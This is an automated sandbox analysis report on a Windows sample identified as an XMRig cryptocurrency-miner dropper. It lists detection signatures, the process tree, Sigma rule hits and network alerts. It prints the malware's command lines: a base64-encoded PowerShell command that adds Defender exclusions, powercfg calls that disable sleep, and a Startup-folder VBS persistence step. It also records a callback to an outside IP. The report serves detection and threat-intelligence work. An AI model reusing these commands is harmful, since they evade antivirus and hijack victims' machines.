Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZppxPm0ASs.exe

Overview

General Information

Sample name:ZppxPm0ASs.exe
renamed because original name is a hash value
Original sample name:3c104350cc2661c345673e91ed672c4c.exe
Analysis ID:1576051
MD5:3c104350cc2661c345673e91ed672c4c
SHA1:d205e94d47949cf3bc3f5226978f6d370c3d3b94
SHA256:1fb9f279263c252a09f12b69c7238c18d2325f7cf7250ebe24ad9149abe62cf4
Tags:exeuser-abuse_ch
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • ZppxPm0ASs.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\ZppxPm0ASs.exe" MD5: 3C104350CC2661C345673E91ED672C4C)
    • powershell.exe (PID: 7880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8056 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RegAsm.exe (PID: 8188 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe" MD5: A4EB36BAE72C5CB7392F2B85609D4A7E)
      • powercfg.exe (PID: 6452 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6748 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 1452 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7112 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 2868 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
        • RegAsm.exe (PID: 7872 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe" MD5: A4EB36BAE72C5CB7392F2B85609D4A7E)
          • powercfg.exe (PID: 576 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 4016 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 2712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 5500 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 1056 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 1648 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • IsStopped.exe (PID: 7324 cmdline: "C:\Users\user\AppData\Roaming\IsStopped.exe" MD5: 3C104350CC2661C345673E91ED672C4C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000000.00000002.2690759712.000001FDF2D60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.ZppxPm0ASs.exe.1fdf2d60000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.ZppxPm0ASs.exe.1fdebbfe4b8.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                  Sigma Signatures

                  Change of critical system settings

                  barindex
                  Sigma detected: Disable power options
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, ParentProcessId: 8188, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6452, ProcessName: powercfg.exe

                  System Summary

                  barindex
                  Sigma detected: Potentially Suspicious Malware Callback Communication
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.157.162.216, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\explorer.exe, Initiated: true, ProcessId: 2868, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49734
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZppxPm0ASs.exe", ParentImage: C:\Users\user\Desktop\ZppxPm0ASs.exe, ParentProcessId: 7280, ParentProcessName: ZppxPm0ASs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7A
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , ProcessId: 1648, ProcessName: wscript.exe
                  Sigma detected: Suspicious Execution of Powershell with Base64
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZppxPm0ASs.exe", ParentImage: C:\Users\user\Desktop\ZppxPm0ASs.exe, ParentProcessId: 7280, ParentProcessName: ZppxPm0ASs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7A
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs" , ProcessId: 1648, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZppxPm0ASs.exe", ParentImage: C:\Users\user\Desktop\ZppxPm0ASs.exe, ParentProcessId: 7280, ParentProcessName: ZppxPm0ASs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7A

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\ZppxPm0ASs.exe, ProcessId: 7280, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:41:16.995944+010020362892Crypto Currency Mining Activity Detected192.168.2.7547301.1.1.153UDP
